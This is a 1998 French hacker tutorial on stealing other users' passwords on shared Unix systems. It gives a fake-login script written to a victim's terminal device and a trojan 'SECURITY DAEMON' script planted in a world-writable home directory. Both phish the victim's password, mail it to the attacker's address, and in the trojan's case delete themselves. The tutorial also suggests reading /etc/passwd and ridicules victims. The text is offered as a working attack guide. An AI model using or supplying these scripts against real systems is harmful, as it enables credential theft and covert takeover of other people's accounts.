                               /"\
                              =====
                             =======
                ----------- ========= -----------
              {{{{   HACKER UN USER SUR UNIX  }}}}
                ----------- ========= -----------
                             =======
                              =====
                               \_/

[iXtlan]
(k)1998



Bon voici quelques petites techniques pour hacker le compte d'un autre 
utilisateur sur un system Unix/Linux...
Attention: cela ne vous permettra pas de prendre le root (a moin que 
l'admin system ne soit vraiment bon a rien) ...;-)

[ le Fake Login ! ]

Kesako?? hehe c'est tout simple mais ca marche 9 fois sur 10! en fait 
tout depend du niveau de comptence de l'utilisateur que vous avez 
choisi comme victime! Essayez de preference sur un utilisateur qui a 
l'air de ne pas savoir manier son clavier, le genre de gars a jouer a 
Duke Nukem toute la journ�e, et a surfer sur le web de microsoft a la 
recherche des dernieres softs pour fenetre95, enfin tu vois le genre 
koi UN GROS NAZE QUI COMPREND RIEN DE RIEN!!!!! (lol:P)

Bon le principe est simple: sous unix chaque connexion utilise un 
terminal (shell ou telnet) qui est en fait un fichier dans 
le rep '/dev'
chaque telnet lanc� va utiliser un de ces fichier ttyXX 
(XX= numero du terminal)

faites un 'who' ce qui va lister les utilisateurs connectes avec leur 
numero de terminal...
% who

[user]  [tty]  [tmps de connexion]
-----   -----  ----------
user1   tty00    12:22 
user2   tty01    00:44 
user3   tty12    05:14
user4   tty08    01:00

voici le resultat d'une commande 'who'. On voit bien que chaque user 
utilise un terminal specifique (user1 utilise le tty0)hors chacun de 
ses terminaux est en fait un fichier /dev/ttyXX, ainsi vous pouvez 
ecrire sur ces fichiers ce qui s'affichera directement sur l'ecran du 
user qui utilise ce terminal!

voici donc ce que nous allons faire! (heheh)
on va executer un ptit script shell qui simule un Reboot du serveur 
et demandera l'utilisateur son Login et Password... 
voici le script deja ecrit 
 
#~/fakelogin.sh
# Ceci doit ressemblez au login du serveur a hacker...

echo "Rebooting system...."
echo " "
echo "Digital UNIX (machine.server.fr) (tty00)" 
echo " "
echo "login: \c"
read lgin
echo off 
echo "Password: \c"
read pw
echo " "
echo on
# mettez votre email
echo "Login: $lgin - Pword: $pw" | mail moi@server.fr

# fin du script

copier ce script dans un fichier fakelogin.sh (placer dans vote 
homedir)voila il vous suffit de faire en sorte que ce script 
ressemble au loggin de votre Unix et de mettre votre email puis de 
tapez:

% cat fakelogin.sh >/dev/ttyXX
(remplacer ttyXX par le terminal a hacke!)

et voila vous allez gentiment recevoir un mail vous donnant le login 
et le mot de passe de cet imbecile a qui vous venez de faire croire 
que le serveur a rebooter et qui lui a suivi betement les instuctions 
de la machine !! mdr hehe:) 

[ le fichier passwd ]

Bon evidement le plus simple pour hacker un unix est de lire 
directement tous les mots de passes la ou ils sont ecrit (c'est a dir 
dans /etc/passwd) mais bon la plus part du temp vous imaginez bien 
que l'admin ne laisse pas ce fichier en lecture ! ou alors il est 
encode ?... donc bon vous pouvez tjrs essaye

% cat /etc/passwd | more 

mais ca m'etonnerai que ca marche ou alors c'est que vous avec de la 
chance grave (si ca marche allez jouer a loto tout de suite!!! heheh)
Attention aux fausses joies car bien souvent le fichier passwd est 
encode! c'est a dire que le fichier peut etre lu mais les mots de 
pass sont remplaces par des '*' et les vrais pass sont dans un autre 
fichier qui lui n'est lisible que par le root! dommage......

[ permissions sur les homedir ]

he oui pourquoi ne pas profiter de l'oubli d'un utilisateur pour lui 
hacker son compte ? aller dans le repetoir des /usr (la ou sont tous 
les comptes des utilisateurs du system) et tapez

% ls -l | more  

ce qui listera tous les comptes avec les permissions:
---------------------
Rappel:
les permissions sur unix se font de la maniere suivante:
r = read 
w = write
x = execute

-rwxr-xr-x  signifie: -rwx (owner) r-x (group) r-x (all)
soit que ce fichier est en lecture/ecritur/exec pour le proprietaire
et en lectur/exec pour les autres

si il y a un 'd' devant cela signifie qu'il s'agit d'un repetoir
---------------------
bon voici un exemple de resultat affiche apres un 'ls -l' dans /usr

[permissions][user][date] [size]
------------  ----  ----   -----
drwxr-xr-x    bob   1998   21
drwxr-xr-x    bill  1998   11
drwxr-xr-x    Zoe   1997   05
drwxrwxrwx    fred  1998   32
drwxr-xr-x    Monic 1997   29

on voit que le homedir de fred est en drwxrwxrwx c'est a dire que 
vous pouvez nous seulment le lire mais aussi y ecire!!! heheh voila 
toute l'astuce, car Fred est surment un neophyte sur unix et il n'a 
pas pense a proteger son rep d'esprits malvaillants (comme vous par 
exemple) et l'a donc laisse en ecriture!!

vous pouvez donc installer tranquillement un ptit script dans le rep 
de fred de maniere a ce que celui ci l'execute et vous donne son mot 
de passe ! Sachez faire en sorte que fred execute ce script et aussi 
qu'il ne se rende pas compte qu'il est en train de lancer de lui meme 
un cheval de troie:)
(le mieux etant de mettre un procede d'auto destruction a la fin du 
script pour qu'il s'efface de lui meme:) 

voici un exemple de script a placer dans le rep de Fred:)

#!/usr/homedir/SECURITY
echo " "
echo "       SECURITY DAEMON     " 
echo " "
echo " The security Daemon has locate that your "
echo " password is unsecure please change it now!"
echo " "
echo "old Password: \c"
read pw
echo " "
echo "New Password: \c"
echo " "
echo "Thank you "
echo on
# mettez votre email
echo "Pword: $pw" | mail you@server.fr
# efface le script
rm -f SECURITY

# fin du script

une fois  que vous avez configurer ce script copier le chez fred
et rendez le executable

% cp SECURITY /usr/fred
% chmod u+x /usr/fred/SECURITY

et voila le pauvre fred une fois de plus en croyant bien faire c 'est 
fait pigeonner son mot de passe comme un bleu!!! heheh 

Voila pour les tekniks de hack sur Unix...